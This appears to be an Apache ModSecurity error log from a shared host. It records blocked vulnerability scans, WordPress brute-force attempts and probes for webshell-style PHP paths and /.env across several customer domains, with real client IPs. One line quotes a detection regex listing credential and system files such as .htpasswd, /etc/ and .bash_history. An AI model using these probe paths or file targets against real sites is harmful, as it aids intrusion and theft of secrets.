[Tue May 26 13:52:15.729745 2026] [security2:error] [pid 555743:tid 555970] [client 185.192.71.237:46941] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/function.php"] [unique_id "ahVYN8jqAquC0YaxQjC7PgAAAWs"]
[Tue May 26 13:52:15.998710 2026] [security2:error] [pid 555743:tid 555977] [client 45.148.10.174:56960] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYN8jqAquC0YaxQjC7RwAAAXI"]
[Tue May 26 13:52:16.046756 2026] [security2:error] [pid 555743:tid 555779] [remote 40.77.167.144:12126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 144.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "api.lagoslawntennisclub1895.com"] [uri "/api/v1/list_programs.php"] [unique_id "ahVYN8jqAquC0YaxQjC7RgABOCM"], referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 13:52:16.131025 2026] [security2:error] [pid 555743:tid 555900] [client 185.92.25.101:54591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/templates/beez3/index.php"] [unique_id "ahVYOMjqAquC0YaxQjC7SwAAASU"]
[Tue May 26 13:52:16.830227 2026] [security2:error] [pid 560287:tid 560538] [client 52.59.43.236:51690] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVYOJmX5s6sDS3wJVcbfQAAAPY"], referer: https://thegoodsporting.com
[Tue May 26 13:52:16.862117 2026] [security2:error] [pid 560287:tid 560493] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYOJmX5s6sDS3wJVcbegAAAMw"]
[Tue May 26 13:52:16.875637 2026] [security2:error] [pid 560287:tid 560506] [client 185.92.25.96:32221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/js/wp-login.php"] [unique_id "ahVYOJmX5s6sDS3wJVcbfAAAANg"]
[Tue May 26 13:52:17.186205 2026] [security2:error] [pid 560287:tid 560445] [client 45.148.10.174:56978] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYOZmX5s6sDS3wJVcbhwAAAJ8"]
[Tue May 26 13:52:17.337240 2026] [security2:error] [pid 560287:tid 560423] [client 185.192.71.244:49141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/install.php"] [unique_id "ahVYOZmX5s6sDS3wJVcbigAAAIo"]
[Tue May 26 13:52:17.353173 2026] [security2:error] [pid 560287:tid 560540] [client 74.249.173.207:38985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unsobered.moes-art.com"] [uri "/inputs.php"] [unique_id "ahVYOZmX5s6sDS3wJVcbiwAAAPg"]
[Tue May 26 13:52:17.789429 2026] [security2:error] [pid 560287:tid 560466] [client 185.192.71.227:49279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/blue/rk2.php"] [unique_id "ahVYOZmX5s6sDS3wJVcblAAAALM"]
[Tue May 26 13:52:17.924387 2026] [security2:error] [pid 555743:tid 555978] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYOcjqAquC0YaxQjC7WwAAAXM"]
[Tue May 26 13:52:17.936187 2026] [security2:error] [pid 555743:tid 555931] [client 45.148.10.174:56994] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYOcjqAquC0YaxQjC7ZAAAAUQ"]
[Tue May 26 13:52:18.618383 2026] [security2:error] [pid 560287:tid 560509] [client 185.192.71.226:46879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/images/class-config.php"] [unique_id "ahVYOpmX5s6sDS3wJVcboQAAANs"]
[Tue May 26 13:52:18.755978 2026] [security2:error] [pid 560287:tid 560458] [client 45.148.10.174:57018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYOpmX5s6sDS3wJVcbpgAAAKs"]
[Tue May 26 13:52:19.743009 2026] [security2:error] [pid 555743:tid 555878] [client 45.148.10.174:57034] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYO8jqAquC0YaxQjC7fAAAAQ8"]
[Tue May 26 13:52:19.978388 2026] [security2:error] [pid 560287:tid 560534] [client 91.230.225.171:49513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/components/com_jea/views/form/tmpl/size.php"] [unique_id "ahVYO5mX5s6sDS3wJVcbwwAAAPQ"]
[Tue May 26 13:52:20.015041 2026] [security2:error] [pid 560287:tid 560448] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYO5mX5s6sDS3wJVcbsgAAAKI"]
[Tue May 26 13:52:20.386674 2026] [security2:error] [pid 560287:tid 560442] [client 185.92.25.136:52427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/templates/beez/index.php"] [unique_id "ahVYPJmX5s6sDS3wJVcbzQAAAJw"]
[Tue May 26 13:52:20.726286 2026] [security2:error] [pid 560287:tid 560512] [client 185.192.71.229:56693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 229.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/bypass.php"] [unique_id "ahVYPJmX5s6sDS3wJVcb0wAAAN4"]
[Tue May 26 13:52:20.737341 2026] [security2:error] [pid 560287:tid 560488] [client 45.148.10.174:57052] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYPJmX5s6sDS3wJVcb1QAAAMc"]
[Tue May 26 13:52:20.790275 2026] [security2:error] [pid 560287:tid 560523] [client 14.191.100.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYPJmX5s6sDS3wJVcbzAAAAOk"]
[Tue May 26 13:52:21.069811 2026] [security2:error] [pid 555743:tid 555976] [client 45.148.10.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYPcjqAquC0YaxQjC7kAAAAXE"]
[Tue May 26 13:52:21.242749 2026] [security2:error] [pid 560287:tid 560533] [client 185.192.71.235:43119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/class.php"] [unique_id "ahVYPZmX5s6sDS3wJVcb3wAAAPM"]
[Tue May 26 13:52:21.312190 2026] [security2:error] [pid 560287:tid 560438] [client 45.148.10.174:57092] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYPZmX5s6sDS3wJVcb4QAAAJk"]
[Tue May 26 13:52:21.612363 2026] [security2:error] [pid 560287:tid 560487] [client 45.148.10.174:57098] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ucdc.co.in"] [uri "/.env"] [unique_id "ahVYPZmX5s6sDS3wJVcb7wAAAMY"]
[Tue May 26 13:52:21.667955 2026] [security2:error] [pid 560287:tid 560546] [client 91.230.225.179:31139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/light/profile.php"] [unique_id "ahVYPZmX5s6sDS3wJVcb8QAAAP4"]
[Tue May 26 13:52:21.717903 2026] [security2:error] [pid 555743:tid 555995] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYPcjqAquC0YaxQjC7kgAAAYQ"]
[Tue May 26 13:52:21.832529 2026] [security2:error] [pid 560287:tid 560516] [client 45.148.10.174:57130] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYPZmX5s6sDS3wJVcb9gAAAOI"]
[Tue May 26 13:52:22.157067 2026] [security2:error] [pid 560287:tid 560534] [client 45.148.10.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYPpmX5s6sDS3wJVcb_QAAAPQ"]
[Tue May 26 13:52:22.297108 2026] [security2:error] [pid 560287:tid 560499] [client 45.148.10.174:57154] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYPpmX5s6sDS3wJVccAQAAANI"]
[Tue May 26 13:52:22.304486 2026] [security2:error] [pid 560287:tid 560478] [client 185.92.25.99:26997] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/product.php"] [unique_id "ahVYPpmX5s6sDS3wJVcb_gAAAL4"]
[Tue May 26 13:52:22.654658 2026] [security2:error] [pid 560287:tid 560497] [client 45.148.10.174:57172] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYPpmX5s6sDS3wJVccCQAAANA"]
[Tue May 26 13:52:22.714338 2026] [security2:error] [pid 560287:tid 560429] [client 129.222.147.134:31986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYPpmX5s6sDS3wJVccDQAAAJA"]
[Tue May 26 13:52:22.716218 2026] [security2:error] [pid 560287:tid 560433] [client 185.92.25.108:60013] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/uploads/autoload_classmap.php"] [unique_id "ahVYPpmX5s6sDS3wJVccDgAAAJQ"]
[Tue May 26 13:52:22.719006 2026] [security2:error] [pid 555743:tid 555916] [client 45.148.10.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYPsjqAquC0YaxQjC7pQAAATU"]
[Tue May 26 13:52:22.727372 2026] [security2:error] [pid 560287:tid 560429] [client 129.222.147.134:31986] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYPpmX5s6sDS3wJVccDQAAAJA"]
[Tue May 26 13:52:23.063857 2026] [security2:error] [pid 560287:tid 560523] [client 45.148.10.174:57202] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYP5mX5s6sDS3wJVccEwAAAOk"]
[Tue May 26 13:52:23.272182 2026] [security2:error] [pid 560287:tid 560449] [client 45.148.10.174:57212] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYP5mX5s6sDS3wJVccGQAAAKM"]
[Tue May 26 13:52:23.575957 2026] [security2:error] [pid 560287:tid 560436] [client 185.192.71.237:25173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/ask.php"] [unique_id "ahVYP5mX5s6sDS3wJVccIwAAAJc"]
[Tue May 26 13:52:23.821835 2026] [security2:error] [pid 555743:tid 555894] [client 45.148.10.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYP8jqAquC0YaxQjC7qgAAAR8"]
[Tue May 26 13:52:23.991684 2026] [security2:error] [pid 560287:tid 560516] [client 185.192.71.240:47233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/rest-api/about.php"] [unique_id "ahVYP5mX5s6sDS3wJVccMQAAAOI"]
[Tue May 26 13:52:24.124916 2026] [security2:error] [pid 560287:tid 560546] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYP5mX5s6sDS3wJVccKAAAAP4"]
[Tue May 26 13:52:24.550639 2026] [security2:error] [pid 560287:tid 560349] [remote 138.199.156.203:59344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.156.199.138.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVYQJmX5s6sDS3wJVccNgAA_D0"]
[Tue May 26 13:52:25.623015 2026] [security2:error] [pid 560287:tid 560535] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYQZmX5s6sDS3wJVccPgAAAPU"]
[Tue May 26 13:52:26.171684 2026] [security2:error] [pid 555743:tid 555965] [client 45.148.10.174:50180] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYQsjqAquC0YaxQjC70QAAAWY"]
[Tue May 26 13:52:26.204488 2026] [security2:error] [pid 560287:tid 560542] [client 45.148.10.174:50164] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYQpmX5s6sDS3wJVccXgAAAPo"]
[Tue May 26 13:52:26.329034 2026] [security2:error] [pid 560287:tid 560449] [client 45.148.10.174:50186] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYQpmX5s6sDS3wJVccYAAAAKM"]
[Tue May 26 13:52:26.346007 2026] [security2:error] [pid 560287:tid 560457] [client 106.192.248.115:52337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYQpmX5s6sDS3wJVccYQAAAKo"]
[Tue May 26 13:52:26.360674 2026] [security2:error] [pid 560287:tid 560457] [client 106.192.248.115:52337] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYQpmX5s6sDS3wJVccYQAAAKo"]
[Tue May 26 13:52:26.397650 2026] [security2:error] [pid 555743:tid 555926] [client 45.148.10.174:50192] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYQsjqAquC0YaxQjC71QAAAT8"]
[Tue May 26 13:52:26.506953 2026] [security2:error] [pid 560287:tid 560503] [client 91.230.225.169:23283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/css/css.php"] [unique_id "ahVYQpmX5s6sDS3wJVccZwAAANU"]
[Tue May 26 13:52:26.514341 2026] [security2:error] [pid 560287:tid 560475] [client 45.148.10.174:50208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYQpmX5s6sDS3wJVccaAAAALs"]
[Tue May 26 13:52:26.843484 2026] [security2:error] [pid 555743:tid 555981] [client 91.230.225.177:63603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/init.php"] [unique_id "ahVYQsjqAquC0YaxQjC73wAAAXY"]
[Tue May 26 13:52:27.303862 2026] [security2:error] [pid 560287:tid 560357] [remote 154.66.198.148:11640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVYQ5mX5s6sDS3wJVcccAAAmUQ"]
[Tue May 26 13:52:27.363157 2026] [security2:error] [pid 555743:tid 555944] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYQsjqAquC0YaxQjC74AAAAVE"]
[Tue May 26 13:52:27.477676 2026] [security2:error] [pid 555743:tid 555896] [client 2409:40f2:1002:1f9a:8000:::0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVYQcjqAquC0YaxQjC7ywABIS8"], referer: https://kingsclub.in/about-us/
[Tue May 26 13:52:27.648162 2026] [security2:error] [pid 555743:tid 555947] [client 185.92.25.137:58405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/user/wp-login.php"] [unique_id "ahVYQ8jqAquC0YaxQjC8IQAAAVQ"]
[Tue May 26 13:52:28.030610 2026] [security2:error] [pid 560287:tid 560448] [client 185.92.25.100:52497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/autoload_classmap/function.php"] [unique_id "ahVYRJmX5s6sDS3wJVccfwAAAKI"]
[Tue May 26 13:52:28.725611 2026] [security2:error] [pid 555743:tid 555957] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYRMjqAquC0YaxQjC8OAAAAV4"]
[Tue May 26 13:52:28.838951 2026] [security2:error] [pid 560287:tid 560541] [client 185.192.71.245:42133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 245.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/item.php"] [unique_id "ahVYRJmX5s6sDS3wJVccjQAAAPk"]
[Tue May 26 13:52:29.814103 2026] [security2:error] [pid 560287:tid 560490] [client 185.92.25.102:22031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 102.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/assets/index.php"] [unique_id "ahVYRZmX5s6sDS3wJVccmAAAAMk"]
[Tue May 26 13:52:30.906401 2026] [security2:error] [pid 560287:tid 560467] [client 185.92.25.107:52397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/.well-known/pki-validation/index.php"] [unique_id "ahVYRpmX5s6sDS3wJVccsAAAALQ"]
[Tue May 26 13:52:30.956280 2026] [security2:error] [pid 560287:tid 560424] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYRpmX5s6sDS3wJVccqwAAAQA"]
